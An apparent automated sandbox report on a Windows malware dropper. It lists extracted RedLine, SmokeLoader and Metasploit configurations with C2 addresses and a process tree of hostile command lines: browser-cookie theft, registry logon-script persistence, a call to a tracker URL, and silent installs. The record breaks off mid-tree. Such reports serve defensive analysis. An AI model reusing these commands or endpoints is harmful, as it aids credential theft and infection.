Analysis

  • max time kernel
    649s
  • max time network
    1803s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 07:49

General

  • Target

    Setup (17).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Amadey CnC Check-In

    suricata: ET MALWARE Amadey CnC Check-In

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Blocklisted process makes network request 20 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 23 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 26 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 36 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2616
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
      • Suspicious use of SetThreadContext
      PID:2632
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        PID:5680
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2624
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2364
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2324
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1848
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1404
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1248
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1204
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1096
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1044
                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        2⤵
                          PID:1920
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                          2⤵
                            PID:6636
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:64
                          • C:\Users\Admin\AppData\Local\Temp\Setup (17).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (17).exe"
                            1⤵
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:640
                            • C:\Users\Admin\Documents\zl9SXynrcd6IGZZxbWxHYH7B.exe
                              "C:\Users\Admin\Documents\zl9SXynrcd6IGZZxbWxHYH7B.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:3692
                              • C:\Users\Admin\Documents\zl9SXynrcd6IGZZxbWxHYH7B.exe
                                C:\Users\Admin\Documents\zl9SXynrcd6IGZZxbWxHYH7B.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4800
                            • C:\Users\Admin\Documents\aU0lq3rS9AYt7swzVmelr1Jt.exe
                              "C:\Users\Admin\Documents\aU0lq3rS9AYt7swzVmelr1Jt.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:1556
                              • C:\Users\Admin\Documents\aU0lq3rS9AYt7swzVmelr1Jt.exe
                                C:\Users\Admin\Documents\aU0lq3rS9AYt7swzVmelr1Jt.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4812
                            • C:\Users\Admin\Documents\ueGXakzzBEF0mfPvr33Uo1UJ.exe
                              "C:\Users\Admin\Documents\ueGXakzzBEF0mfPvr33Uo1UJ.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2012
                            • C:\Users\Admin\Documents\oZqKHdMoBVDsaLfTn6Z1KkWT.exe
                              "C:\Users\Admin\Documents\oZqKHdMoBVDsaLfTn6Z1KkWT.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2528
                            • C:\Users\Admin\Documents\6XhF03e2HbN8JNNpmhkGvWrs.exe
                              "C:\Users\Admin\Documents\6XhF03e2HbN8JNNpmhkGvWrs.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2644
                            • C:\Users\Admin\Documents\PKjylgkaI2dBH7KiOFpjhcJR.exe
                              "C:\Users\Admin\Documents\PKjylgkaI2dBH7KiOFpjhcJR.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:3880
                              • C:\Users\Admin\Documents\PKjylgkaI2dBH7KiOFpjhcJR.exe
                                "C:\Users\Admin\Documents\PKjylgkaI2dBH7KiOFpjhcJR.exe" -q
                                3⤵
                                • Executes dropped EXE
                                PID:4940
                            • C:\Users\Admin\Documents\KnAw0lFIQluShP0KbMpaczDs.exe
                              "C:\Users\Admin\Documents\KnAw0lFIQluShP0KbMpaczDs.exe"
                              2⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious use of WriteProcessMemory
                              PID:3748
                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:4308
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                    PID:4600
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:2352
                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Checks whether UAC is enabled
                                  • Drops file in Program Files directory
                                  PID:4340
                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:4388
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:2156
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5116
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:4512
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:2088
                                  • C:\Windows\system32\WerFault.exe
                                    C:\Windows\system32\WerFault.exe -u -p 4388 -s 1288
                                    4⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:416
                              • C:\Users\Admin\Documents\rpl9nvqgaxpw_awAVXLWYUdN.exe
                                "C:\Users\Admin\Documents\rpl9nvqgaxpw_awAVXLWYUdN.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3972
                                • C:\Users\Admin\AppData\Roaming\6530498.exe
                                  "C:\Users\Admin\AppData\Roaming\6530498.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: MapViewOfSection
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1540
                                • C:\Users\Admin\AppData\Roaming\8912559.exe
                                  "C:\Users\Admin\AppData\Roaming\8912559.exe"
                                  3⤵
                                    PID:3244
                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      PID:1328
                                • C:\Users\Admin\Documents\zKcbddtu7Wb1ZmPtc2mCX7j6.exe
                                  "C:\Users\Admin\Documents\zKcbddtu7Wb1ZmPtc2mCX7j6.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2076
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 760
                                    3⤵
                                    • Program crash
                                    PID:5172
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 784
                                    3⤵
                                    • Program crash
                                    PID:4124
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 744
                                    3⤵
                                    • Program crash
                                    PID:356
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 824
                                    3⤵
                                    • Program crash
                                    PID:5576
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 964
                                    3⤵
                                    • Program crash
                                    PID:5912
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 992
                                    3⤵
                                    • Program crash
                                    PID:6712
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 1008
                                    3⤵
                                    • Program crash
                                    PID:7096
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 1456
                                    3⤵
                                    • Program crash
                                    PID:4604
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 1412
                                    3⤵
                                    • Program crash
                                    PID:6704
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 1352
                                    3⤵
                                    • Program crash
                                    PID:5528
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 908
                                    3⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    PID:3068
                                • C:\Users\Admin\Documents\RfTShwmUWNk7wpUxBiLEhRJW.exe
                                  "C:\Users\Admin\Documents\RfTShwmUWNk7wpUxBiLEhRJW.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3160
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 664
                                    3⤵
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4472
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 676
                                    3⤵
                                    • Program crash
                                    PID:4868
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 648
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5000
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 700
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2160
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1128
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4996
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1164
                                    3⤵
                                    • Executes dropped EXE
                                    • Program crash
                                    PID:3724
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1160
                                    3⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1660
                                • C:\Users\Admin\Documents\JYZSNJb0KXgrcbWWd4Hl1BNk.exe
                                  "C:\Users\Admin\Documents\JYZSNJb0KXgrcbWWd4Hl1BNk.exe"
                                  2⤵
                                    PID:3724
                                  • C:\Users\Admin\Documents\nznJ2RrcsxvGoRygW3AvVUUi.exe
                                    "C:\Users\Admin\Documents\nznJ2RrcsxvGoRygW3AvVUUi.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:3180
                                  • C:\Users\Admin\Documents\1WqhTpgZwS8RG3bZW3XtZUhr.exe
                                    "C:\Users\Admin\Documents\1WqhTpgZwS8RG3bZW3XtZUhr.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:3888
                                    • C:\Users\Admin\Documents\1WqhTpgZwS8RG3bZW3XtZUhr.exe
                                      "C:\Users\Admin\Documents\1WqhTpgZwS8RG3bZW3XtZUhr.exe"
                                      3⤵
                                      • Modifies data under HKEY_USERS
                                      PID:8416
                                  • C:\Users\Admin\Documents\fUPCFWCpYnVKUYesSNcWggvE.exe
                                    "C:\Users\Admin\Documents\fUPCFWCpYnVKUYesSNcWggvE.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2144
                                  • C:\Users\Admin\Documents\3gmGDw2Cev9ycJK2_3OV35S6.exe
                                    "C:\Users\Admin\Documents\3gmGDw2Cev9ycJK2_3OV35S6.exe"
                                    2⤵
                                      PID:1540
                                    • C:\Users\Admin\Documents\G6pfKMN8_Qc5VIX27s00Nh3c.exe
                                      "C:\Users\Admin\Documents\G6pfKMN8_Qc5VIX27s00Nh3c.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1112
                                    • C:\Users\Admin\Documents\x8DhO4zKpFWjEEHjgLVUu03J.exe
                                      "C:\Users\Admin\Documents\x8DhO4zKpFWjEEHjgLVUu03J.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:1232
                                      • C:\Users\Admin\Documents\x8DhO4zKpFWjEEHjgLVUu03J.exe
                                        C:\Users\Admin\Documents\x8DhO4zKpFWjEEHjgLVUu03J.exe
                                        3⤵
                                        • Executes dropped EXE
                                        PID:4832
                                      • C:\Users\Admin\Documents\x8DhO4zKpFWjEEHjgLVUu03J.exe
                                        C:\Users\Admin\Documents\x8DhO4zKpFWjEEHjgLVUu03J.exe
                                        3⤵
                                        • Executes dropped EXE
                                        PID:4916
                                      • C:\Users\Admin\Documents\x8DhO4zKpFWjEEHjgLVUu03J.exe
                                        C:\Users\Admin\Documents\x8DhO4zKpFWjEEHjgLVUu03J.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5088
                                    • C:\Users\Admin\Documents\asaqL4jd_iQVgrA0ekmLFUEk.exe
                                      "C:\Users\Admin\Documents\asaqL4jd_iQVgrA0ekmLFUEk.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3680
                                    • C:\Users\Admin\Documents\Uw3q9fiBK_7_tw0vLuiOhMeA.exe
                                      "C:\Users\Admin\Documents\Uw3q9fiBK_7_tw0vLuiOhMeA.exe"
                                      2⤵
                                        PID:2656
                                        • C:\Users\Admin\AppData\Local\Temp\is-MC5AN.tmp\Uw3q9fiBK_7_tw0vLuiOhMeA.tmp
                                          "C:\Users\Admin\AppData\Local\Temp\is-MC5AN.tmp\Uw3q9fiBK_7_tw0vLuiOhMeA.tmp" /SL5="$1025C,138429,56832,C:\Users\Admin\Documents\Uw3q9fiBK_7_tw0vLuiOhMeA.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of FindShellTrayWindow
                                          PID:4252
                                          • C:\Users\Admin\AppData\Local\Temp\is-F63PJ.tmp\Setup.exe
                                            "C:\Users\Admin\AppData\Local\Temp\is-F63PJ.tmp\Setup.exe" /Verysilent
                                            4⤵
                                            • Executes dropped EXE
                                            • Drops file in Program Files directory
                                            PID:4844
                                            • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                              "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:204
                                            • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                              "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                              5⤵
                                              • Executes dropped EXE
                                              PID:3768
                                              • C:\Users\Admin\AppData\Local\Temp\is-QPS2M.tmp\Inlog.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-QPS2M.tmp\Inlog.tmp" /SL5="$20262,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                6⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious use of FindShellTrayWindow
                                                PID:2392
                                                • C:\Users\Admin\AppData\Local\Temp\is-K2RQ3.tmp\Setup.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\is-K2RQ3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                  7⤵
                                                    PID:2532
                                                    • C:\Users\Admin\AppData\Local\Temp\is-FR826.tmp\Setup.tmp
                                                      "C:\Users\Admin\AppData\Local\Temp\is-FR826.tmp\Setup.tmp" /SL5="$4033A,17369384,721408,C:\Users\Admin\AppData\Local\Temp\is-K2RQ3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                      8⤵
                                                      • Loads dropped DLL
                                                      • Drops file in Program Files directory
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:2640
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-PU8CK.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                        9⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2656
                                                        • C:\Windows\SysWOW64\expand.exe
                                                          expand C:\Users\Admin\AppData\Local\Temp\is-PU8CK.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                          10⤵
                                                          • Drops file in Windows directory
                                                          PID:6312
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                        9⤵
                                                          PID:8108
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                            10⤵
                                                              PID:8384
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                            9⤵
                                                            • Checks computer location settings
                                                            PID:8208
                                                          • C:\Users\Admin\AppData\Local\Temp\is-PU8CK.tmp\{app}\vdi_compiler.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\is-PU8CK.tmp\{app}\vdi_compiler"
                                                            9⤵
                                                              PID:9120
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-PU8CK.tmp\{app}\vdi_compiler.exe"
                                                                10⤵
                                                                  PID:7932
                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                    ping localhost -n 4
                                                                    11⤵
                                                                    • Runs ping.exe
                                                                    PID:5860
                                                              • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                9⤵
                                                                • Loads dropped DLL
                                                                PID:9204
                                                      • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                        "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Enumerates connected drives
                                                        • Modifies system certificate store
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:4680
                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629279841 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                          6⤵
                                                            PID:5364
                                                        • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                          "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:2236
                                                          • C:\Users\Admin\AppData\Local\Temp\is-N6RA3.tmp\WEATHER Manager.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-N6RA3.tmp\WEATHER Manager.tmp" /SL5="$2026E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Adds Run key to start application
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:3244
                                                            • C:\Users\Admin\AppData\Local\Temp\is-6E3N3.tmp\Setup.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\is-6E3N3.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                              7⤵
                                                              • Loads dropped DLL
                                                              • Enumerates connected drives
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:6756
                                                              • C:\Windows\SysWOW64\msiexec.exe
